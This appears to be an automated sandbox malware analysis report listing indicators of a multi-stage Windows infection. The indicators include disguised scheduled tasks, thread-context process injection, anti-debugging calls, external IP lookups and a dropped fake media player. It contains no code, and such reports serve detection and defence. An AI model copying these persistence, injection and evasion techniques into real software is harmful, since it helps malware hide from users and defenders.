installer.exemsiexec.exedescription ioc process File opened (read-only) \??\K: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\B: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 24 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1451 api.2ip.ua 1452 api.2ip.ua 276 ip-api.com 341 api.2ip.ua 807 api.ipify.org 1242 api.2ip.ua 778 ipapi.co 809 icanhazip.com 1111 api.2ip.ua 1241 api.2ip.ua 85 ipinfo.io 305 ipinfo.io 459 api.2ip.ua 533 ipapi.co 1112 api.2ip.ua 86 ipinfo.io 247 ipinfo.io 248 ipinfo.io 342 api.2ip.ua 1303 api.2ip.ua 4 ip-api.com 461 api.2ip.ua 532 ipapi.co 808 api.ipify.org -
Drops file in System32 directory 64 IoCs
Processes:
svchost.exebXhtqdI.exerundll32.exerundll32.exesvchost.exepowershell.execmd.exeOOWUeMc.exepowershell.exeInstall.exepowershell.exerundll32.exepowershell.exepowershell.exepowershell.exeInstall.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent A998981BC79FBDF7 svchost.exe File opened for modification C:\Windows\System32\Tasks\Azure-Update-Task svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_BF5C002C0B47AC940D40DFFC532E4C71 bXhtqdI.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive cmd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 bXhtqdI.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol OOWUeMc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 bXhtqdI.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File opened for modification C:\Windows\System32\Tasks\gOWWqevQB svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat bXhtqdI.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 84062D3243A98AFE svchost.exe File opened for modification C:\Windows\System32\Tasks\gYUSnSWDi svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE bXhtqdI.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 bXhtqdI.exe File opened for modification C:\Windows\System32\Tasks\RulYNORIEfYpYdh2 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\RulYNORIEfYpYdh svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache bXhtqdI.exe File opened for modification C:\Windows\System32\Tasks\sQKEyxOvETjkhD svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA bXhtqdI.exe File opened for modification C:\Windows\System32\Tasks\spuTWhHjihUt svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData bXhtqdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 bXhtqdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_BE9EEF936EC97838527255B8F50AE885 bXhtqdI.exe File opened for modification C:\Windows\System32\Tasks\eoTgVxzVyVjpEcHcuxi2 svchost.exe File opened for modification C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2481030822-2828258191-1606198294-1000 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8A6A7E24EA4C3355B6BE43AA2093BF34 bXhtqdI.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies bXhtqdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft bXhtqdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA bXhtqdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_BE9EEF936EC97838527255B8F50AE885 bXhtqdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bXhtqdI.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\Tasks\bvmcjEjDUxHOOxIZsK svchost.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\Tasks\YqJChhYnTMHzkMjCc svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 45 IoCs
Processes:
Wed15566afaea59e.exe6517854.scr5795491.scrZ2ECp8JodQbWGsvkzsmoyMv5.exeZ58YFjny287dHiWTdWlvNYF0.exe3wIhaEv7Ltp2XU8bgsQTib5q.exeOITjDfOmO1EwVIRrcSQjebGx.exe6642635.scrE60.exeMoney10k_.exe5957.exe2483.exepid process 4392 Wed15566afaea59e.exe 4276 6517854.scr 4408 5795491.scr 5080 Z2ECp8JodQbWGsvkzsmoyMv5.exe 5780 Z58YFjny287dHiWTdWlvNYF0.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 6160 OITjDfOmO1EwVIRrcSQjebGx.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5048 6642635.scr 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 11236 E60.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 10824 Money10k_.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5836 3wIhaEv7Ltp2XU8bgsQTib5q.exe 5164 5957.exe 7376 2483.exe -
Suspicious use of SetThreadContext 45 IoCs
Processes:
svchost.exepostback.exeschtasks.execOSvj6_TfVEcVvnn5pGOY1Gg.exeMicrosoftEdgeCP.exeservices64.exeHelper.exeDCCF.exeDCCF.exe52FB.exeZ7G064Ykp6b8nPZ3PHwQSiXK.exebuild2.exebackgroundTaskHost.exetmp6180_tmp.exebuild3.exemstsca.exemstsca.exeuviavihmstsca.exemstsca.exemstsca.exemstsca.exemstsca.exeDCCF.exemstsca.exemstsca.exemstsca.exeuviavihmstsca.exemstsca.exeDCCF.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exeDCCF.exemstsca.exemstsca.exemstsca.exeuviavihmstsca.exemstsca.exeDCCF.exedescription pid process target process PID 4160 set thread context of 5024 4160 Wed15e2f113a40ce5.exe PID 3060 set thread context of 4664 3060 svchost.exe svchost.exe PID 4372 set thread context of 5760 4372 postback.exe explorer.exe PID 4852 set thread context of 5868 4852 schtasks.exe Install.exe PID 1364 set thread context of 6588 1364 cOSvj6_TfVEcVvnn5pGOY1Gg.exe cOSvj6_TfVEcVvnn5pGOY1Gg.exe PID 3772 set thread context of 5032 3772 MicrosoftEdgeCP.exe wXZz5xY9daoSOnWFCSX4abIE.exe PID 7072 set thread context of 5156 7072 services64.exe explorer.exe PID 8580 set thread context of 4328 8580 Helper.exe Helper.exe PID 6780 set thread context of 4828 6780 DCCF.exe DCCF.exe PID 9184 set thread context of 8036 9184 DCCF.exe DCCF.exe PID 4560 set thread context of 3964 4560 52FB.exe 52FB.exe PID 6380 set thread context of 5744 6380 Z7G064Ykp6b8nPZ3PHwQSiXK.exe Z7G064Ykp6b8nPZ3PHwQSiXK.exe PID 4956 set thread context of 1448 4956 build2.exe build2.exe PID 6708 set thread context of 6220 6708 backgroundTaskHost.exe 7BB2.exe PID 7304 set thread context of 6032 7304 tmp6180_tmp.exe tmp6180_tmp.exe PID 4792 set thread context of 6216 4792 build3.exe build3.exe PID 11136 set thread context of 2840 11136 mstsca.exe mstsca.exe PID 4420 set thread context of 6560 4420 mstsca.exe mstsca.exe PID 6632 set thread context of 9864 6632 uviavih uviavih PID 6628 set thread context of 5328 6628 mstsca.exe mstsca.exe PID 9504 set thread context of 10520 9504 mstsca.exe mstsca.exe PID 5896 set thread context of 7264 5896 mstsca.exe mstsca.exe PID 10848 set thread context of 8840 10848 mstsca.exe mstsca.exe PID 2236 set thread context of 5256 2236 mstsca.exe mstsca.exe PID 3732 set thread context of 4568 3732 DCCF.exe DCCF.exe PID 7996 set thread context of 1584 7996 mstsca.exe mstsca.exe PID 6508 set thread context of 6608 6508 mstsca.exe mstsca.exe PID 10812 set thread context of 8912 10812 mstsca.exe mstsca.exe PID 10596 set thread context of 9140 10596 uviavih uviavih PID 10216 set thread context of 4528 10216 mstsca.exe mstsca.exe PID 8756 set thread context of 8648 8756 mstsca.exe mstsca.exe PID 5308 set thread context of 8096 5308 DCCF.exe DCCF.exe PID 10236 set thread context of 9620 10236 mstsca.exe mstsca.exe PID 7272 set thread context of 11152 7272 mstsca.exe mstsca.exe PID 10616 set thread context of 8072 10616 mstsca.exe mstsca.exe PID 9696 set thread context of 10992 9696 mstsca.exe mstsca.exe PID 9064 set thread context of 10384 9064 mstsca.exe mstsca.exe PID 10624 set thread context of 11048 10624 DCCF.exe DCCF.exe PID 5792 set thread context of 9068 5792 mstsca.exe mstsca.exe PID 10464 set thread context of 5004 10464 mstsca.exe mstsca.exe PID 3792 set thread context of 9848 3792 mstsca.exe mstsca.exe PID 5176 set thread context of 6700 5176 uviavih uviavih PID 8996 set thread context of 8976 8996 mstsca.exe mstsca.exe PID 6204 set thread context of 6892 6204 mstsca.exe mstsca.exe PID 5988 set thread context of 7312 5988 DCCF.exe DCCF.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exedata_load.exebXhtqdI.exemsiexec.exesetup_2.tmpdata_load.exeDllHost.exereg.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll autosubplayer.exe File created C:\Program Files\temp_files\cache.dat data_load.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak bXhtqdI.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac autosubplayer.exe File created C:\Program Files\temp_files\data.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_h264_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File created C:\Program Files\temp_files\cache.dat data_load.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml autosubplayer.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak DllHost.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Windows Mail\Raeletolamae.exe reg.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libvlc.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libvlccore.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\2 autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html autosubplayer.exe -
Drops file in Windows directory 64 IoCs
Processes:
msiexec.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeforfiles.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdgeCP.exeschtasks.exeschtasks.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI56D4.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri forfiles.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI4274.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6C08.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Tasks\YqJChhYnTMHzkMjCc.job svchost.exe File opened for modification C:\Windows\Installer\MSI7060.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI606B.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\bvmcjEjDUxHOOxIZsK.job schtasks.exe File opened for modification C:\Windows\Installer\52c28.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI2FB2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6E2C.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI3E0C.tmp msiexec.exe File created C:\Windows\Tasks\TzpzstmaipgnuWYOU.job schtasks.exe File opened for modification C:\Windows\Installer\MSI3CE2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI64E1.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\YqJChhYnTMHzkMjCc.job schtasks.exe File created C:\Windows\Installer\52c2b.msi msiexec.exe File created C:\Windows\Tasks\RulYNORIEfYpYdh.job schtasks.exe File opened for modification C:\Windows\Debug\ESE.TXT forfiles.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Tasks\bvmcjEjDUxHOOxIZsK.job schtasks.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI4B65.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Tasks\RulYNORIEfYpYdh.job svchost.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Tasks\TzpzstmaipgnuWYOU.job svchost.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Tasks\bvmcjEjDUxHOOxIZsK.job svchost.exe File opened for modification C:\Windows\Installer\MSI40BE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4F5E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5618.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI6A71.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI7CF4.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri File created C:\Windows\Installer\52c28.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI3FA3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI50D6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5367.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI439E.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI69A5.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 40 IoCs
Processes:
